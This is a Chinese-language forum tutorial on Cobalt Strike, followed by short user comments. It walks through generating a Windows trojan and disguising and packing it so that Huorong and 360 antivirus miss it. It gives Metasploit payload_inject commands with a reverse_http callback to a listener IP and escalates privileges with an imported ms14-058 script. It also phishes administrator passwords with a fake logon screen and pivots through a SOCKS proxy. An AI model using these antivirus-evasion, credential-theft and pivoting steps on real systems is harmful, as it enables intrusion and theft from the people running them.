作为一款协同APT工具,功能十分强大,针对内网的渗透测试和作为apt的控制终端功能,使其变成众多APT组织的首选,fireeye多次分析过实用cobaltstrike进行apt的案例。
cs需要一个服务器来进行,我们把它放到服务器上。然后运行./teaserver ip 密码
即可。
然后使用cs客户端连接即可,输入对应ip、端口和密码。
首先创建监听器
攻击-》生成后门-》windows executable
,选择监听点击保存即可生成木马
不过cs生成木马已经被杀软加入病毒库,很容易别查杀,所以我们需进行一些免杀操作。
这里使用前辈的免杀木马脚本,虽然已经被加入病毒库了,但是通过常见免杀还是可以bypass杀软。
首先打开应用Restorator
,拖进木马和网易云,把网易云所有资源信息都复制到木马上,点击保存即可。
不过这样子修改的话,还是不太行,还是被火绒查杀了
那么我们对这个木马,进行加壳,检测选项基本都勾上,点击“保护”
即可生成。
我们再打开杀软查杀,发现组合免杀生效了,绕过了火绒和360
尝试运行看看是否会被查杀,可以看到没有拦截,成功上线了。
当我们获得一个cs木马会话时,那么该怎么传递到msf呢?其实也挺简单的,再配置一个监听器,设置模块为Foreign HTTP
。
配置好后在上线的主机上右击Spawn(增加会话)
,选择Foreign HTTP
监听模块,这时候msf监听那边就会接收到会话
这里还是新建一个监听器,设置模块为beacon HTTP
接下来把kali上获得的meterpreter会话
转发到cobaltstrike主机
上,这里我们需要用到一个exploit模块
:
1. exploit/windows/local/payload_inject
2. set payload windows/meterpreter/reverse_http
3. set DisablePayloadHandler true
4. set lhost 192.168.43.147
5. set lport 8081
6. set session 4
7. run
这时候返回客户端可以发现已经返回一个名为cs的会话
当我们拿到会话时,首先应该输入sleep 1
来修改响应时间,因为cs默认执行命令响应为60/s
,这样子太慢了。影响实验效率
接下来要怎么提权呢?我们回到beacon shell
输入elevate
查看可用的提权脚本,发现只有两个。
为了丰富我们的提权脚本,我们可以自己导入一个多提权脚本。导入很简单:cobalt strike-》脚本-》laod->选择要导入cna
即可。
导入成功后,我们使用各个导入的脚本尝试提权:右键会话-》梼杌-》权限维持-》ms14-058
,这时候可以看到返回一个system的会话
,说明提权成功。
有时候获取到会话时,因为目标系统版本过高,无法直接使用猕猴桃读取密码,还得去修改注册表,这就很麻烦。这时候我们就可以用c语言写一个钓鱼的系统登录页面来窃取密码,在beacon输入命令execute-assembly FakeLogonScreen.exe
即可
此时目标服务器弹出了登录页面,目标管理员一看到应该也没有什么怀疑,直接就输入密码。这时候我们的cs客户端可以看到管理员输入的内容了。
很多人为了操作方便,习惯性的将密码储存在浏览器中。这使得攻击者可以利用人懒得特性,来进行获取存储在浏览器里的密码。
当我们拿下内网后,就可以扫描存在内网中的网站,因为很多测试网站都处于内网中且安全性低。这样就可以攻击内网网站了。
会话右键-》中转-》SOCKS Server 开启 socks4 代理,选择想要的端口,打开 proxifier输入我们刚刚选择的端口即可,对内网做更多操作。
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
奖励系统 | 50.00 | 0 | 2021-06-11 17:05:15 | 投稿满 5 赞奖励 |
veek | 80.00 | 0 | 2020-12-08 10:10:23 | 期待完善~ |
打赏我,让我更有动力~
The attachment is hidden and you need to reply to the topic before it becomes visible.
© 2016 - 2024 掌控者 All Rights Reserved.
wufan
发表于 2021-1-29
666
评论列表
加载数据中...
秋紫山
发表于 2021-1-31
666
评论列表
加载数据中...
nan1g
发表于 2021-2-1
q
评论列表
加载数据中...
李万吉
发表于 2021-2-2
学习到了,感谢分享!!!
评论列表
加载数据中...
高粱红
发表于 2021-3-11
666
评论列表
加载数据中...
code131415
发表于 2021-3-17
学习了,谢谢
评论列表
加载数据中...
哆啦
发表于 2021-3-24
瞅瞅,谢谢分享~
评论列表
加载数据中...
yangroupaomo
发表于 2021-3-26
大佬可以分享下加壳工具链接吗,万分感谢:safengine shielden
评论列表
加载数据中...
zqq977z
发表于 2021-4-1
66666
评论列表
加载数据中...
carey
发表于 2021-4-1
666
评论列表
加载数据中...
a1287074202
发表于 2021-4-9
学习了,老哥
评论列表
加载数据中...
sumor
发表于 2021-4-12
6
评论列表
加载数据中...
zzjw
发表于 2021-4-16
1
评论列表
加载数据中...
cangk
发表于 2021-4-25
学习学习
评论列表
加载数据中...
gc144188
发表于 2021-5-31
可以可以
评论列表
加载数据中...
潜神默记
发表于 2021-6-9
666
评论列表
加载数据中...
amwusrso
发表于 2021-6-11
666
评论列表
加载数据中...
一生情
发表于 2021-6-27
这就很棒
评论列表
加载数据中...
逗鱼
发表于 2021-7-29
6
评论列表
加载数据中...
yangroupaomo
发表于 2021-8-2
感谢打来,大佬有没有权限维持,建立计划任务的攻略
评论列表
加载数据中...